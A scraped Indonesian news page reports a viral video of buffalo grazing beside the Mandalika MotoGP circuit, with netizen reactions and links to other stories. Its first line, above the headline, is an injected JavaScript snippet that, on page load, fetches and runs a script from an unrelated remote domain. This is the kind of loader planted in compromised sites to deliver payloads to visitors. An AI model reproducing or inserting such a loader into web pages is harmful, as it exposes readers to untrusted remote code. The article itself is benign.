(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Viral Kerbau Merumput Dekat Sirkuit Mandalika, Publik : Ayo Angon Kebo!


KANALKALIMANTAN.COM – Sirkuit Mandalika akan digunakan untuk penyelenggaraan turnamen balap motor internasional, MotoGP. Sedianya turnamen tersebut digelar pada bulan Maret 2022 mendatang. Bahkan sejumlah pebalap sudah tiba di Indonesia dan kekinian menikmati masa liburan sejenak sebelum kembali berlaga.

Karena itulah tak heran bila media sosial banyak diramaikan dengan video-video terkait Sirkuit Mandalika dan MotoGP. Termasuk video yang memperlihatkan sejumlah kerbau asyik merumput di perbukitan dekat Sirkuit Mandalika.

Salah satu yang turut mengunggah video ini adalah akun Twitter @jowoshitpost. Semula video memperlihatkan beberapa ekor kerbau yang asyik merumput dengan latar belakang Sirkuit Mandalika, bahkan tampak ada kendaraan yang berlalu lalang di jalanan khusus tersebut.

Kamera lantas beralih menyorot ke berbagai sudut lain, memperlihatkan kerbau-kerbau yang merumput sampai ke daerah puncak perbukitan hijau nan asri tersebut. Tampak pula pemandangan pantai dan laut di sekitar Sirkuit Mandalika yang memukau, yang kian cantik dengan cerahnya langit biru.

 

Baca juga : Nine Ball Tournament di Amuntai, Ketua KONI HSU: Kemunculan Pebiliar Muda 

Tentu warganet ikut terpukau dengan video singkat tersebut. Sebagian ikut menyoroti keberadaan kerbau maupun mengagumi keindahan pemandagan Sirkuit Mandalika, namun ada pula yang khawatir bila hewan-hewan ternak itu sampai memasuki lintasan.

“Lhah iki nek moro-moro kebone mlayu nang lintasan piye (Lha ini kalau tiba-tiba kerbaunya lari ke lintasan gimana?)” ujar seorang warganet.

“Ada pembatasnya/pager bro … lucu juga seh ya natural banget neh kesannya,” balas warganet lain, meredam kecemasan bila kerbau tersebut tiba-tiba ingin bersaing dengan Marc Marquez dkk.

“Jaman mbiyen angon kebo hiburane main suling, saiki angon kebo iso karo ndelok MotoGP (Dulu menggembalakan kerbau hiburannya main seruling, sekarang bisa sama nonton MotoGP),” tutur warganet lain.

“Mandalika dan kearifan lokal,” celetuk warganet.

 

Baca juga : Petaka Ritual di Pantai, 10 Jemaah Padepokan Tunggal Jati Nusantara Tewas Digulung Ombak

“Redbull Racing dengan maskotnya,” seloroh warganet.

“Sirkuit internasional dengan sentuhan kearifan lokal. Ayo angon kebo!” kata warganet lain.

“Meskipun kelas Internasional tapi kearifan lokal masih dijunjung tinggi ,” komentar warganet.

“Cakepp banget viewnya,” puji warganet.

“Maw jadi kerbau,” imbuh warganet lain, tampaknya iri dengan kerbau yang malah bisa menyaksikan MotoGP secara langsung.

“Menyatu dengan alam,” timpal yang lainnya. (kanalkalimantan.com/suara.com)

Editor : kk


Desy Arfianty

Recent Posts

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

3 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

6 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

6 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

20 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

22 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

1 hari ago

This website uses cookies.